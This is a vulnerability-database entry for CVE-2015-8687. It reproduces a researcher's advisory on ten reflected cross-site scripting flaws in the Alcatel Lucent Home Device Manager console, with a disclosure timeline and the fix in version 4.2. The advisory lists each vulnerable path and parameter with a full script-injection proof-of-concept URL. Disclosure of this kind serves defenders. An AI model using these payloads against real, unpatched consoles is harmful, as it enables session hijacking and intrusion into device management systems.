Sign-up

ID

VAR-E-201601-0518


CVE

cve_id:CVE-2015-8687

Trust: 0.8

sources: BID: 79864 // PACKETSTORM: 135133

TITLE

Alcatel Lucent Home Device Manager Cross Site Scripting

Trust: 0.5

sources: PACKETSTORM: 135133

DESCRIPTION

The Alcatel Lucent Home Device Manager management console suffers from multiple cross site scripting vulnerabilities.

Trust: 0.5

sources: PACKETSTORM: 135133

AFFECTED PRODUCTS

vendor:alcatelmodel:lucent home device managerscope: - version: -

Trust: 0.5

vendor:alcatel lucentmodel:home device managerscope:eqversion:4.1.10.5

Trust: 0.3

vendor:alcatel lucentmodel:home device managerscope:neversion:4.2

Trust: 0.3

sources: BID: 79864 // PACKETSTORM: 135133

EXPLOIT

Document Title:
===============
Alcatel Lucent Home Device Manager - Management Console Multiple XSS

CVE-Number:
===========
CVE-2015-8687

Release Date:
=============
03 Jan 2016

Abstract Advisory Information:
=============================
Ugur Cihan Koc discovered ten Reflected XSS
vulnerabilities Alcatel Lucent Home Device Manager - Management Console

Vulnerability Disclosure Timeline:
==================================
10 Dec 2015 Bug reported to the vendor.
10 Dec 2015 Vendor returned ; investigating
16 Dec 2015 Vendor has validated the issues & fixed
27 Dec 2015 CVE number assigned
03 Jan 2016 Disclosured

Affected Product(s):
====================
Alcatel Lucent Home Device Manager - Management Console 4.1.10.5
may be old version could be affected

Exploitation Technique:
=======================
Local, Authenticated

Severity Level:
===============
High

Technical Details & Description:
================================
Ø Sample Payload : 42f8b36<script>alert(1)<%2fscript>152b4

Ø Affected Path/Parameter: [10 parameter]

1. /hdm/DeviceType/getDeviceType.do [deviceTypeID parameter]
o
http://10.240.71.198:7003/hdm/DeviceType/getDeviceType.do?deviceTypeID=42f8b36
<script>alert(1)<%2fscript>152b4

2. /hdm/PolicyAction/findPolicyActions.do [policyActionClass parameter]
o
http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=&policyActionClass=c9e31
"><script>alert(1)<%2fscript>3bd174ff207&policyActionFunction=0

3. /hdm/PolicyAction/findPolicyActions.do [policyActionName parameter]
o
http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=553a3
"><script>alert(1)<%2fscript>721d335792b&policyActionClass=&policyActionFunction=0

4. /hdm/SingleDeviceMgmt/getDevice.do [deviceID parameter]
o
http://10.240.71.198:7003/hdm/SingleDeviceMgmt/getDevice.do?deviceID=8001a1a0b
<script>alert(1)<%2fscript>1a032

5. /hdm/ajax.do [operation parameter]
o http://10.240.71.198:7003/hdm/ajax.do?operation=getDeviceById0fa81
<script>alert(1)<%2fscript>238957ca4e0&deviceId=8001

6. /hdm/device/editDevice.do [deviceID parameter]
o http://10.240.71.198:7003/hdm/device/editDevice.do?deviceID=8001c94e5
<script>alert(1)<%2fscript>45f4a

7. /hdm/policy/findPolicies.do [policyAction parameter]
o
http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=19f01
"><script>alert(1)<%2fscript>b37ee8333eb&policyClass=&policyStatus=&trigger=trigger_all

8. /hdm/policy/findPolicies.do [policyClass parameter]
o
http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=&policyClass=c77cb
"><script>alert(1)<%2fscript>5ddc63ced2e&policyStatus=&trigger=trigger_all

9. /hdm/policy/findPolicies.do [policyName parameter]
o
http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=654dd
"><script>alert(1)<%2fscript>5b8329ee237&policyAction=&policyClass=&policyStatus=&trigger=trigger_all

10. /hdm/xmlHttp.do [operation parameter]
o
http://10.240.71.198:7003/hdm/xmlHttp.do?operation=getQueuedActionsd4b0c
<script>alert(1)<%2fscript>217f045ae1f&deviceID=8001

Proof of Concept (PoC):
=======================
POC Video;
https://drive.google.com/file/d/0B-LWHbwdK3P9Y3UyZnFmZjJqa1U/view?usp=sharing

Solution Fix & Patch:
====================
Fixed version of 4.2

Security Risk:
==============
The risk of the vulnerability above estimated as high.

Credits & Authors:
==================
Ugur Cihan Koc(@_uceka_)
Blog: www.uceka.com

Trust: 0.5

sources: PACKETSTORM: 135133

EXPLOIT HASH

LOCAL

SOURCE

md5: a6f03dff114369e765cb6b12953c34e0
sha-1: 692c7520c5623c71eb3a1da018d437d361fc6b35
sha-256: 6ca37aa2b741d2a932bf88aeb2a7c29e34b2f41d21497e9dcccf69519f7dc7f9
md5: a6f03dff114369e765cb6b12953c34e0

Trust: 0.5

sources: PACKETSTORM: 135133

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 135133

TYPE

xss

Trust: 0.5

sources: PACKETSTORM: 135133

TAGS

tag:exploit

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:xss

Trust: 0.5

sources: PACKETSTORM: 135133

CREDITS

Ugur Cihan KOC

Trust: 0.5

sources: PACKETSTORM: 135133

EXTERNAL IDS

db:NVDid:CVE-2015-8687

Trust: 0.8

db:PACKETSTORMid:135133

Trust: 0.5

db:BIDid:79864

Trust: 0.3

sources: BID: 79864 // PACKETSTORM: 135133

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2015-8687

Trust: 0.5

url:http://seclists.org/fulldisclosure/2016/jan/0

Trust: 0.3

url:http://www.alcatel-lucent.com/

Trust: 0.3

sources: BID: 79864 // PACKETSTORM: 135133

SOURCES

db:BIDid:79864
db:PACKETSTORMid:135133

LAST UPDATE DATE

2022-07-27T10:03:01.653000+00:00


SOURCES UPDATE DATE

db:BIDid:79864date:2016-01-03T00:00:00

SOURCES RELEASE DATE

db:BIDid:79864date:2016-01-03T00:00:00
db:PACKETSTORMid:135133date:2016-01-05T13:13:13